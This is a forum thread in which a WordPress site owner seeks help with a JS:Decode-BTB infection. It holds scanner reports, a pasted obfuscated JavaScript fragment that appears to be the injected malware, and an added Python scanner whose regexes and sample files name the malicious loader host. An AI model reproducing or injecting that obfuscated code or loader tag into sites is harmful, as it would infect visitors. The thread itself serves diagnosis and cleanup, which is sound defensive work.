Hi, how are you? Every time I connect to my site hxxp://www.vijaga.com, Avast sends me a message saying it has blocked a js decode-btb infection, and it is very annoying, because in principle everything is fine. It also mixes up my URL and shows me a different one…
The thing is, I can't find the problem. I have scanned the code on websites to detect it and nothing, everything comes out fine…
Help?
Post in English.
Killmalware report / vijaga.com http://killmalware.com/www.vijaga.com/
IP history (213.186.33.19) https://www.virustotal.com/en/ip-address/213.186.33.19/information/
Multiple domains on same IP and many are Blacklisted
IPvoid http://www.ipvoid.com/scan/213.186.33.19
URLvoid http://www.urlvoid.com/ip/213.186.33.19
[b]IP ADDRESS: 213.186.33.19[/b]
We have found in our database of already analyzed websites that there are 12280 websites hosted in the same web server with IP address 213.186.33.19 and IP hostname cluster010.ovh.net. Remember that it is not good to have too many websites located in the same web server because if a website gets infected by malware, it can easily affect the online reputation of the IP address and also of all the other websites.
There is malware on this website: -adahb.org/elements/include/jquery-migrate.min.g.js Malware
See: https://urlquery.net/report.php?id=1438793675403
WordPress Version
4.2.4
Version is current
Found in /readme.html
WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress site's front page.
wpfront-scroll-top 1.4.4 latest release (1.4.4)
http://wpfront.com/scroll-top-plugin/
folder-gallery 1.7.2 latest release (1.7.2)
http://www.jalby.org/wordpress/
WordPress Theme
The theme has been found by examining the path /wp-content/themes/ theme name /
vijagatema2 1.0
While plugins get a lot of attention when it comes to security vulnerabilities, themes are another source of security vulnerabilities within WordPress installations. Always keep them updated to the latest version available and check the developer's theme page for information about security-related updates and fixes.
Warning User Enumeration is possible
The first two user IDs were tested to determine if user enumeration is possible.
User ID 1 : vijaga
User ID 2 : None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring, as this will reduce the chance of automated password attackers gaining access. However, it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.
Only the first two user IDs were tested with this scan; use the Nmap NSE enumeration scripts (use your own Nmap installation or try option 2 below) to discover additional user IDs.
Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.
/wp-content/uploads/ enabled
/wp-content/plugins/ disabled
Directory indexing was tested on the /wp-content/uploads/ and /wp-content/plugins/ directories. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation, either through the web server configuration or .htaccess.
Website has a direct link to malware: https://app.webinspector.com/public/reports/37857749
This is a high risk page
Result for 2015-07-21 12:16:03 UTC
Website: htxp://adahb.org
Checked URL: htxp://adahb.org/elements/include/jquery-migrate.min.g.js
Links to malware files detected:
Link to Malware File. Comodo analysts' verdict.
SHA1: 803744244c357ba83ba392c7229e90671c0b654c
Link to Malware File. Found by Antivirus Engine.
SHA1: 803744244c357ba83ba392c7229e90671c0b654c
Avast detects JS:Decode-BTB [Trj], and not only Avast detects it but 11 other AV vendors as well:
https://www.virustotal.com/en/file/9597d3714a6c553d3b2a28777fe65da00836def7cf497e14c9a58e6b7de2bf3f/analysis/
polonus
Hi hi,
Thanks for the info.
I suppose that I have to find this malicious code in some file in my site folders and delete it, right?
But is it possible to find the file faster? Is it a .php or a .js? It is driving me crazy…
var _1007;var _7416=‘1188D126E108A1212C1086D1188B696E1224E870E1104D1170F1098A1206D1158E1110F1164C1200B780B1188D1110A1116F1110A1188D1188D1110A1188A858A564E1212A1086A1188D696C1128B1170D1194C1200B870F1218A1134B1164C1104A1170C1218D780D1152A1170A1098D1086E1200A1134F1170E1164E780F1128D1170F1194A1200E1164F1086B1158B1110C858B564E1212E1086E1188C696E1116F870E1224D780A1134D1164E1104C1110D1224B978A1116E744B1128C1170D1194A1200F750A858F696C564A1134A1116D744F1116F864A792B696E732F732B696C1224A696D702F870D696E73
… 658 bytes are skipped …
7276_8255/21);var _3420=(_8255==7)?String:eval;_6210=’‘;_11=_7276_8255/_7276_8255;for(_1007=3;_1007<_11;_1007++)_6210+=(_7276_8255-2);var _3254=’_6221’;var _2564=‘_3254=_6210’;function _8457(_1395){_3420(_5918);_8457(_6771);_6771(_2564);_8457(_3254);}var _5918=‘_8457=_3420’;var _6771=‘_6771=_8457’;_8457(_5219);
Thanks again!
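To answer the question of where to look, here is an added example (not from this thread, Avast, or any of the scanners quoted above): a small Python scanner that walks a WordPress tree and flags files by the traits visible in the pasted snippet. The indicator regexes are assumptions drawn from that snippet and the scanner reports, not a vendor signature, and the file paths and contents in SAMPLES are constructed for the demonstration.

```python
import os
import re

# Heuristics taken from the snippet pasted above: "var _NNNN=" declarations, a long
# quoted blob of digits and A-F letters, the (cond)?String:eval switch, and the remote
# host / lookalike filename the scanners reported. All four are assumptions, not a signature.
INDICATORS = {
    "obfuscated_var_decl": re.compile(r"var _\d{2,5}\s*=\s*['\"\u2018\u2019]"),
    "long_hexlike_blob": re.compile(r"['\"\u2018\u2019][0-9A-F]{200,}"),
    "eval_alias": re.compile(r"\?\s*String\s*:\s*eval\b"),
    "remote_loader": re.compile(r"adahb\.org|jquery-migrate\.min\.g\.js"),
}
SCAN_EXT = (".php", ".js", ".html", ".htm")

def classify(text):
    """Return the names of every indicator that fires on one file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_tree(root):
    """Walk a WordPress install and map each suspicious file to its indicators."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    found = classify(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample files (not the site's real files) so the scan runs stand-alone.
SAMPLES = {
    # Injected theme footer: obfuscated blob plus the String/eval switch seen in the thread.
    "wp-content/themes/vijagatema2/footer.php":
        "<?php wp_footer(); ?>\n<script>var _1007;var _7416='" + "1188D" * 50
        + "';var _3420=(_8255==7)?String:eval;</script>",
    # Dropped loader pointing at the flagged host (URL defanged as in the thread).
    "wp-content/uploads/2015/07/cache.php":
        "<script src='hxxp://adahb.org/elements/include/jquery-migrate.min.g.js'></script>",
    # Genuine jQuery Migrate: similar name, but no indicator fires.
    "wp-includes/js/jquery/jquery-migrate.min.js":
        "/*! jQuery Migrate v1.2.1 */\nvar jQueryMigrate={};",
}

def scan_samples():
    """Classify the constructed samples exactly as scan_tree() classifies real files."""
    return {p: classify(t) for p, t in SAMPLES.items() if classify(t)}
```

Run `scan_tree("/path/to/wordpress")` against a copy of the site files; every path it returns is worth diffing against a clean copy of the theme, plugin or core file before deleting anything.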
I think this URL is the problem: hxxp://adahb.org/elements/include/jquery-migrate.min.g.js
as displayed at Killmalware http://killmalware.com/www.vijaga.com/